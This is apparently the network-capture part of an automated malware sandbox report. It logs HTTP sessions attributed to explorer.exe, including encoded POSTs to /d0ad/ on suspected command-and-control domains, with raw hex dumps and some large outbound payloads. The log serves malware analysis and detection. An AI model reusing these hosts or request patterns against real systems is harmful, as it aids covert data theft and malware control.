Oct 26, 2022 13:16:14.671529055 CEST	450	IN	HTTP/1.1 404 Not Found Date: Wed, 26 Oct 2022 11:16:14 GMT Server: Apache Content-Length: 1080 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4b 61 6e 69 74 3a 32 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 4f 6f 70 73 21 20 4e 6f 74 68 69 6e 67 20 77 61 73 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 3c 61 20 68 72 65 66 3d 22 23 22 3e 52 65 74 75 72 6e 20 74 6f 20 68 6f 6d 65 70 61 67 65 3c 2f 61 3e 3c 2f 70 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 6f 63 69 61 6c 22 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 66 61 63 65 62 6f 6f 6b 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 77 69 74 74 65 72 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 69 6e 74 65 72 65 73 74 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 23 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Kanit:200" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/font-awesome.min.css" /><link type="text/css" rel="stylesheet" href="/css/style.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops! Nothing was found</h2><p>The page you are looking for might have been removed had its name changed or is temporarily unavailable. <a href="#">Return to homepage</a></p><div class="notfound-social"><a href="#"><i class="fa fa-facebook"></i></a><a href="#"><i class="fa fa-twitter"></i></a><a href="#"><i class="fa fa-pinterest"></i></a><a href="#"><i class="fa fa-google-plus"></i></a></div></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.11.20	49955	207.60.131.46	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:27.738840103 CEST	2261	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=CcRoIk99VuHdxqnbMe4fCWW8YB6+5lBHd7AattmFAjuGnedAqC5z1GiP1/3phXFikd8x5PSyWZu2r/HN2vGAs2KGSq5bV7fyPg== HTTP/1.1 Host: www.driftreiki.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:21:27.920660019 CEST	2261	IN	HTTP/1.1 403 Forbidden Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Wed, 26 Oct 2022 11:21:27 GMT Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.11.20	49956	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:32.960971117 CEST	2262	OUT	POST /d0ad/ HTTP/1.1 Host: www.clickthelink.xyz Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.clickthelink.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.clickthelink.xyz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 70 65 68 4b 7e 54 43 44 56 6b 59 49 4e 6b 67 45 28 54 4e 7a 65 45 67 56 36 5a 6d 6e 33 4d 7a 54 77 38 6f 31 53 47 52 78 47 58 37 55 6f 58 46 49 47 50 6e 72 7e 65 4a 73 55 33 6d 77 55 6e 79 62 78 64 72 52 39 67 6a 68 28 4a 66 49 42 6b 47 51 53 4b 50 39 6d 54 49 67 33 74 56 50 46 71 33 76 55 56 57 77 66 39 69 6a 71 30 4b 32 61 35 42 38 55 56 44 70 4c 4e 52 6c 6b 77 44 4b 38 34 70 42 70 69 4f 53 6b 48 37 39 53 68 43 43 7e 77 7a 31 68 72 4b 6a 72 39 43 50 45 71 72 67 71 6a 53 68 41 45 49 5a 43 2d 6b 4b 43 74 46 71 44 67 6f 5f 54 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=pehK~TCDVkYINkgE(TNzeEgV6Zmn3MzTw8o1SGRxGX7UoXFIGPnr~eJsU3mwUnybxdrR9gjh(JfIBkGQSKP9mTIg3tVPFq3vUVWwf9ijq0K2a5B8UVDpLNRlkwDK84pBpiOSkH79ShCC~wz1hrKjr9CPEqrgqjShAEIZC-kKCtFqDgo_TA).
Oct 26, 2022 13:21:32.973880053 CEST	2263	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:21:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 74 68 65 6c 69 6e 6b 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.clickthelink.xyz/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.11.20	49957	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:35.004374027 CEST	2264	OUT	POST /d0ad/ HTTP/1.1 Host: www.clickthelink.xyz Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.clickthelink.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.clickthelink.xyz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 70 65 68 4b 7e 54 43 44 56 6b 59 49 4d 46 51 45 7a 51 56 7a 59 6b 67 55 31 35 6d 6e 39 73 7a 66 77 38 73 31 53 43 4a 66 47 6b 54 55 70 7a 4a 49 55 4d 28 72 75 4f 4a 73 4d 6e 6d 35 61 48 79 55 78 64 58 76 39 68 66 68 28 4a 4c 49 48 57 7e 51 61 61 50 79 79 44 49 76 28 4e 56 4d 42 71 33 35 55 56 61 4b 66 35 79 6a 70 48 4f 32 5a 5f 74 38 51 42 76 71 4d 74 52 6e 73 51 44 4c 6e 6f 70 78 70 69 44 6e 6b 47 54 48 48 41 32 43 7e 55 44 31 67 72 4b 73 6c 4e 44 6d 47 71 71 63 73 6a 43 6f 4e 47 34 61 64 72 30 34 43 50 49 39 48 7a 6c 75 52 56 59 4f 65 6d 32 47 78 34 6f 67 35 6c 57 4f 6e 56 4c 30 6d 62 79 35 7e 32 76 4b 35 51 6d 57 44 62 67 52 31 31 6d 57 6f 59 54 67 4e 4c 71 42 30 53 4a 58 38 74 66 48 46 49 4c 49 71 55 39 58 4b 48 49 32 4a 52 6a 76 37 61 32 6f 41 61 58 51 61 34 52 76 48 4b 63 4f 66 33 64 55 78 4a 68 35 62 51 48 52 74 65 4c 35 69 76 33 67 62 50 73 58 45 4f 33 5a 70 6e 62 6b 36 32 46 4b 35 6c 33 68 55 39 6c 5f 54 74 6e 6d 69 34 46 47 69 68 4d 43 52 61 76 45 4e 6b 71 52 4e 62 6a 39 30 48 31 57 69 74 52 59 6d 47 31 65 71 32 55 30 71 59 28 7a 65 64 65 53 54 6d 6b 62 4c 58 44 72 73 6d 32 65 48 42 28 30 6a 79 30 4f 4c 53 68 6f 56 39 79 4c 69 54 68 42 42 34 6f 4e 4e 62 57 50 43 59 73 55 37 36 68 6c 4d 59 57 42 69 43 65 4e 78 52 4d 2d 69 4d 36 74 6e 62 6d 71 6b 46 4b 59 7a 76 75 6b 62 2d 71 34 51 5f 38 7a 31 41 42 6c 43 65 64 6a 47 5f 6f 2d 67 75 38 4b 77 4c 32 67 7e 31 28 58 72 68 31 30 54 58 39 38 28 77 75 69 65 6d 52 4f 4d 49 30 6f 7e 76 75 42 65 75 74 68 4c 57 35 50 75 53 36 50 57 4b 56 6b 52 4e 49 4f 56 6b 34 62 54 68 54 4d 50 6c 55 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=pehK~TCDVkYIMFQEzQVzYkgU15mn9szfw8s1SCJfGkTUpzJIUM(ruOJsMnm5aHyUxdXv9hfh(JLIHW~QaaPyyDIv(NVMBq35UVaKf5yjpHO2Z_t8QBvqMtRnsQDLnopxpiDnkGTHHA2C~UD1grKslNDmGqqcsjCoNG4adr04CPI9HzluRVYOem2Gx4og5lWOnVL0mby5~2vK5QmWDbgR11mWoYTgNLqB0SJX8tfHFILIqU9XKHI2JRjv7a2oAaXQa4RvHKcOf3dUxJh5bQHRteL5iv3gbPsXEO3Zpnbk62FK5l3hU9l_Ttnmi4FGihMCRavENkqRNbj90H1WitRYmG1eq2U0qY(zedeSTmkbLXDrsm2eHB(0jy0OLShoV9yLiThBB4oNNbWPCYsU76hlMYWBiCeNxRM-iM6tnbmqkFKYzvukb-q4Q_8z1ABlCedjG_o-gu8KwL2g~1(Xrh10TX98(wuiemROMI0o~vuBeuthLW5PuS6PWKVkRNIOVk4bThTMPlU.
Oct 26, 2022 13:21:35.016572952 CEST	2265	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 26 Oct 2022 11:21:35 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6c 69 63 6b 74 68 65 6c 69 6e 6b 2e 78 79 7a 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='0; url=http://www.clickthelink.xyz/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.11.20	49958	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:37.035926104 CEST	2271	OUT	POST /d0ad/ HTTP/1.1 Host: www.clickthelink.xyz Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.clickthelink.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.clickthelink.xyz/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 70 65 68 4b 7e 54 43 44 56 6b 59 49 4d 46 51 45 7a 51 56 7a 59 6b 67 55 31 35 6d 6e 39 73 7a 66 77 38 73 31 53 43 4a 66 47 6b 4c 55 6f 47 56 49 47 73 44 72 38 65 4a 73 45 48 6d 30 61 48 79 4e 78 64 4f 6f 39 68 53 65 28 50 50 49 41 46 32 51 62 6f 33 79 34 6a 49 75 69 39 56 4f 46 71 32 75 55 56 58 51 66 35 33 57 71 30 53 32 61 39 46 38 56 77 76 70 51 74 52 6c 73 51 44 50 78 59 70 58 70 69 48 33 6b 47 50 48 48 43 79 43 28 6c 28 31 6d 34 69 73 73 39 43 55 51 61 71 54 6d 44 44 61 4e 47 74 72 64 72 30 47 43 4f 4d 39 48 30 78 75 41 6d 77 4e 65 47 32 47 7e 6f 6f 6a 75 31 4b 43 6e 52 53 7a 6d 62 75 35 7e 31 28 4b 35 77 6d 57 47 35 59 57 69 6c 6e 54 35 6f 54 33 4a 4b 57 5a 30 55 6c 70 38 76 54 48 47 34 50 49 72 6e 46 58 47 47 49 32 56 42 6a 74 32 36 32 37 50 36 58 55 61 34 68 43 48 4f 73 30 66 77 6c 55 77 74 35 35 4c 42 48 4f 71 2d 4c 7a 76 5f 33 50 57 76 67 4c 45 4f 6d 41 70 6e 61 38 36 30 70 4b 35 55 48 68 56 34 52 2d 51 39 6e 62 33 6f 46 54 73 78 77 49 52 61 44 4d 4e 6e 71 42 4e 64 44 39 6c 58 31 57 7a 38 52 62 78 6d 31 64 6f 32 55 69 33 49 7e 37 65 64 62 35 54 6e 67 6c 4d 6e 28 72 74 58 47 65 4e 78 28 72 6f 43 30 4b 42 79 68 69 45 74 79 4c 69 54 39 5f 42 34 6b 4e 59 2d 69 50 43 71 6b 55 74 5a 4a 6c 4b 59 58 4b 69 43 65 63 78 52 52 4f 69 4d 69 44 6e 62 36 54 6b 47 6d 59 79 36 4b 6b 59 37 4b 6e 56 50 39 35 78 41 42 2d 61 2d 52 77 47 37 77 49 67 75 74 33 77 34 43 67 39 30 50 58 34 78 31 33 56 33 39 46 32 51 75 34 55 47 74 4b 4d 49 70 58 7e 73 79 52 65 70 52 68 49 33 45 56 7a 41 36 51 48 4e 77 4d 56 4e 55 69 4c 53 6b 50 49 6b 7e 4a 64 68 75 42 6a 50 28 38 4f 4d 6e 48 67 39 69 63 7a 56 63 55 4f 66 70 7a 6c 42 51 53 49 74 30 6f 6a 6c 52 76 79 45 42 68 72 74 42 30 75 6e 4e 33 6f 39 35 4b 52 4e 4b 37 55 45 6f 54 36 6e 44 6f 53 48 34 66 58 73 37 4f 31 62 49 71 6b 4a 35 76 49 61 4f 76 4f 4f 53 78 66 63 6c 79 4e 2d 46 6a 57 63 51 77 44 49 4b 4f 49 79 53 30 57 39 58 6f 4a 46 37 55 6c 71 69 64 64 6c 30 75 7e 6b 31 53 37 72 55 77 62 59 66 4f 44 4a 71 62 69 47 42 75 36 68 72 47 4e 32 6f 67 5a 71 38 32 39 56 79 4a 7e 49 6e 61 70 6e 46 55 69 44 6d 46 64 73 34 34 59 75 6a 45 4e 49 6e 39 72 43 76 64 39 43 39 4c 34 48 43 78 67 51 44 4f 37 72 56 61 7a 67 4c 76 69 59 37 7a 44 54 6f 46 43 36 56 35 54 39 74 37 70 39 4d 54 70 68 4d 6f 50 4d 38 49 4a 4f 57 71 76 77 39 33 38 68 64 4a 39 64 56 6e 72 78 48 36 56 57 67 46 58 4c 78 49 44 44 39 69 32 45 35 4e 67 70 52 6f 75 57 35 79 43 66 77 44 55 6f 42 38 73 4e 5a 6b 72 6f 56 47 6a 59 36 74 78 6f 55 61 5a 61 6c 4f 43 6f 32 57 5a 76 6f 35 62 6e 6c 5a 69 69 6c 75 4a 5f 70 35 6d 73 69 6b 28 31 64 6b 65 37 36 76 66 6d 76 31 37 73 4b 47 6d 51 7a 39 52 65 46 38 4b 67 54 30 6f 61 35 6e 43 34 66 6c 37 39 36 6f 48 4f 53 66 37 79 37 75 4a 71 69 50 78 32 74 4d 50 6b 4d 58 54 7a 6c 64 4e 46 62 76 55 43 79 50 38 77 52 39 66 52 58 44 55 59 55 6b 74 75 50 37 4f 75 55 33 65 67 45 68 4a 42 70 74 68 73 56 48 4c 64 6a 46 77 37 45 4a 50 70 64 44 76 71 6e 62 61 7a 28 52 6e 6f 35 70 59 4d 55 53 48 4b 53 2d 7a 78 68 56 6d 50 4b 73 75 32 44 49 36 63 35 34 33 76 77 76 50 35 6d 41 45 43 73 7a 50 4d 47 53 67 73 66 54 58 77 39 56 43 79 75 71 51 57 28 31 66 37 72 48 53 77 76 71 77 42 64 6a 7e 78 37 64 6b 34 41 68 51 7a 74 70 35 65 71 51 34 4b 5a 75 71 43 33 50 39 74 75 77 4f 2d 6b 6e 65 6d 38 62 68 52 68 41 61 66 49 62 61 39 41 35 65 44 58 55 34 4d 33 49 6f 59 6f 4d 57 67 28 42 73 36 28 4a 69 61 31 42 42 62 61 70 6e 32 4c 58 52 61 4b 55 54 33 47 46 79 75 7e 6f 78 35 47 64 76 55 58 46 76 4b 50 5f 6a 63 52 56 54 45 4b 49 77 58 28 2d 6b 68 44 6c 7e 62 58 6f 36 64 57 4b 44 57 76 73 4f 63 49 42 64 34 57 77 64 6b 7e 36 73 30 46 71 36 67 5a 7a 52 7a 32 53 32 77 46 71 4c 33 79 4c 54 36 34 32 6a 56 7a 33 59 34 71 59 34 71 34 59 6d 39 7e 4f 4b 55 53 69 6a 77 49 78 55 61 66 79 57 51 28 59 70 78 45 47 41 44 6c 75 47 44 52 43 46 6e 65 68 6c 57 28 52 50 73 6d 65 28 2d 6a 67 45 31 4c 72 34 68 67 61 7a 51 52 4d 6c 6e 62 2d 6c 35 37 66 50 78 6b 78 55 57 44 36 49 4a 38 4f 6a 77 4d 48 52 6e 73 50 66 42 64 75 4b 59 45 5f 51 67 59 6a 5a 45 50 38 38 30 64 67 78 5a 55 44 4c 5a 72 72 71 7a 4d 6a 38 5a 41 65 52 44 42 73 64 72 64 5f 72 6b 36 Data Ascii: jXu=pehK~TCDVkYIMFQEzQVzYkgU15mn9szfw8s1SCJfGkLUoGVIGsDr8eJsEHm0aHyNxdOo9hSe(PPIAF2Qbo3y4jIui9VOFq2uUVXQf53Wq0S2a9F8VwvpQtRlsQDPxYpXpiH3kGPHHCyC(l(1m4iss9CUQaqTmDDaNGtrdr0GCOM9H0xuAmwNeG2G~ooju1KCnRSzmbu5~1(K5wmWG5YWilnT5oT3JKWZ0Ulp8vTHG4PIrnFXGGI2VBjt2627P6XUa4hCHOs0fwlUwt55LBHOq-Lzv_3PWvgLEOmApna860pK5UHhV4R-Q9nb3oFTsxwIRaDMNnqBNdD9lX1Wz8Rbxm1do2Ui3I~7edb5TnglMn(rtXGeNx(roC0KByhiEtyLiT9_B4kNY-iPCqkUtZJlKYXKiCecxRROiMiDnb6TkGmYy6KkY7KnVP95xAB-a-RwG7wIgut3w4Cg90PX4x13V39F2Qu4UGtKMIpX~syRepRhI3EVzA6QHNwMVNUiLSkPIk~JdhuBjP(8OMnHg9iczVcUOfpzlBQSIt0ojlRvyEBhrtB0unN3o95KRNK7UEoT6nDoSH4fXs7O1bIqkJ5vIaOvOOSxfclyN-FjWcQwDIKOIyS0W9XoJF7Ulqiddl0u~k1S7rUwbYfODJqbiGBu6hrGN2ogZq829VyJ~InapnFUiDmFds44YujENIn9rCvd9C9L4HCxgQDO7rVazgLviY7zDToFC6V5T9t7p9MTphMoPM8IJOWqvw938hdJ9dVnrxH6VWgFXLxIDD9i2E5NgpRouW5yCfwDUoB8sNZkroVGjY6txoUaZalOCo2WZvo5bnlZiiluJ_p5msik(1dke76vfmv17sKGmQz9ReF8KgT0oa5nC4fl796oHOSf7y7uJqiPx2tMPkMXTzldNFbvUCyP8wR9fRXDUYUktuP7OuU3egEhJBpthsVHLdjFw7EJPpdDvqnbaz(Rno5pYMUSHKS-zxhVmPKsu2DI6c543vwvP5mAECszPMGSgsfTXw9VCyuqQW(1f7rHSwvqwBdj~x7dk4AhQztp5eqQ4KZuqC3P9tuwO-knem8bhRhAafIba9A5eDXU4M3IoYoMWg(Bs6(Jia1BBbapn2LXRaKUT3GFyu~ox5GdvUXFvKP_jcRVTEKIwX(-khDl~bXo6dWKDWvsOcIBd4Wwdk~6s0Fq6gZzRz2S2wFqL3yLT642jVz3Y4qY4q4Ym9~OKUSijwIxUafyWQ(YpxEGADluGDRCFnehlW(RPsme(-jgE1Lr4hgazQRMlnb-l57fPxkxUWD6IJ8OjwMHRnsPfBduKYE_QgYjZEP880dgxZUDLZrrqzMj8ZAeRDBsdrd_rk6Q24OUCw6c6PRH2L5lj125aX60rgjtkMhNxQfBtmJmiB9We2(dlcN1tDzG(zpwK6sIPCh_wGtsY05Q(grF~T9Lt05QXrTciXEE0Kiw0bSi(xykAC7w7sFFMF0bDOjMxUIdo2su21jhhH(FWCl94a(YvJUpBVUvLYBBErwG4HpsLQSsfAVferGQZqedu-2t7S1bZuy6a7cIhraJDa~2v2C84wCk8_jdwQbyCrs2cjfyu2WUqIKo6Ty-vvkt0mXg8JLW0vkAaMIlTNvCg9uup5E8j6Smg4LqehBSqyzKe7RhZl2QDIM7gyX9qFIVulLbWx8MenX9mEwJCYVWZD7bRD0fJJVffvhj5j(0C6D9J_o04T7F4e9f9yTajzBelaA-~6VPpgOrY27iHlAEDkburs1csBg8HCG3DlrSW-5h5LuyqmuV(IDsqLEr3JXV6FM6Tm3nstPCVsH42dSRX3PYfcNo325fIiOGq5LeZmn0N0WZJG0FZXWAjjB0usoHL8m2qcUkSZRxkhjZF9DVCeZ6ylvjVwCC(PHk62DkE0xW~Xq-6MqMbLzQ31FecRYxv-r1etqtTnTcwO8QCYyhyyx5mS7KmhyXBYlghrGOWZ~QYDoxLwthFBrUZ-rv4bQ2gr753wqMAiB7(qbZ0Kg2v_WKgSQgt99xZrlROa1Lqnrwy2FxFukXM78vENITNIeVVuWzpMJCDQRIPJoFSwCOi6esk2XEk3jyI3d_ABLoqQBSed7xeeiv(gFOY94o1SHjDnG2yqbrrTXL4Ljdmvf-uLMLY7yzlJQormmc~pOnRTiwxqbmVqO8bt2OkpBkT5Kp(XCK9pDEKZYtg-wMtJHFFwFx0AWHavHQIWfDv_XUEaW57raizp3Y5TiTblUZV4Oo9ug07FoibDS-7lXeVrxoWuzN7tAIz_IPOZAiiNrrYpeBS0441Yw6HOUWt5rh7etIfkN_Vb7fLHfMpz2O21oMnorgLXW_Ldm_rHyqG8Tql5VgQOGhawz4oubK8zc4Hx7Pe4uV8WEm6HA9NTffRyY0fVgoPlkVaOHmVIsjBa4QtiTnHXJ81Whu7pxDHNB3ku2ngpF3swlH0FFsBXi4aqdIcbFUR3YMOIX9GT(gUbgoJpEl(2mKAwbPgJs_cH6Kb9m0yToGBSQTIInzaNy1DEpXKZ~w6Z4DEN2ag7~0rTDw6JnlgX8OA1toN-0OIa2WLLA55hyPLrinQGPGJYJv2eJKYLTc32yHBKHP7rr1lkCgM6qiczYyNipDhahwV7al25pB64HUSEZfRrAqQFokY4Z8p20mfARmtBUwoEBtKajQHaxk8ljYQnPDYVTArqKS7DuFf7~aKpHLlFvdQUL70EBNIzhWJSxUZzQwfM5exlJlwnSaQ4pcaL2wC9anx6wBiZavm3fZNK(6jNeNvMORLH7WbvKym12OQZYjagDzQxzZG8iMkIMlKzjzYgeHb1nrQYoMzXM6HAk40khCHh3IGtPowT1Z1y9AKiuyJyKGSwsKwlXaB-xoITvmlYk0xzDwVVyP1TmWRtNGDvBXqS5vz7EfOUIdBaNlIC~IsFHN0deF9ug_dFWPC1TMAXU5lgHFgCLSjaAtuTwBVYFt~eobilzduyj01_IYCIlT5_nmHynLQsLE5sfrrtXWLyTrnnyXLJEYPbp0mW2arUGXOkBagB16nqSfFC5Nda5UIuJGg895U8kxA8WiliyU0YvY3lJwpth0TBrP9C4DZ_Fso9Y9h1PIhGtzfi58ZUPCzBNPjMnadfyJsWS7qJ(3W7qg5_i66pSds6mPg6k6TSG9IcWqbQECyX7aEZtYENHQL4zBYWWNwP4x8UNk8Jg_4I7WHoMCbs5R5bMXo_~hKcvxKv6mnM9EPinGa2CdbycvBGh96-VP94nHgVq18HBN0ivB~zvzJbtPGPU6Z4(fslfvI5cgWrEPkfRHt8SYf30NyjpJjCPsp0cTibJ5YXdFGB6IbZs6yc3ZfVuVCG9cR5MjD18txV907ZKnLMt8AZPQlcRwz-ps3D1yt_cbocGR9pg6XhE7F-jeo9tRnE4VlXe4i7HLh_gy(QfUE50Pp7KZS_FxI0Zqu9sQ1by82nzmRzECM-dMIiuRiAW60mMb1Hrr1hgGkRhLHYq9n0LzuHELvsM8WdjC6Z33fZXeS_9rpZTcDs11Ei~lfJwTxFPBe1DpeqWRAE8xLASHwlo5dDyfYwaTlXedqyIHvTb9CZZ2~PJJs5S9bb5GrPTTx-3UasECi3elwUIlX6RGehsaqNLXSjWNSABVFI8UwNZhjNEWK-XpQ9jsheioxOoEeBumY3QMcVckiKSr7D97KrMAAKZxfhsEIupEVoE3Y9izqUtz1v(xXQSkaRwc00jGw12oEobxK99P~N1U2Dg6(YvVLMXsgNHLkVAk1PqZFR8jzJFsG8SHT63Qm7RdZbq7L9uldyKP8bS8ebvxtx2mkYRmI_QMqI3CpMlohLr3zYLudjkIiGhHZr04VESFTL3oMFcKscpmT9qOnVUUutcYT0VrtfdoGNNYu-YKyFrK9eSaLyVHY4cXQkwzKCH2iayLrkr1UyhI55Sy~8aFTCQ40brx3DeDbZzdamdaBfLh4ha_ad2b2My9tHwQevrEts0z6tQMSzuiJqr3gqsRdiyyZAxi(pamt-MDy34kSuPDaoOiTKG_52L4(9wuAx(vMcX8OANb3iWAAFeoyx8S35URbtBMfV~PT8INemKp5o
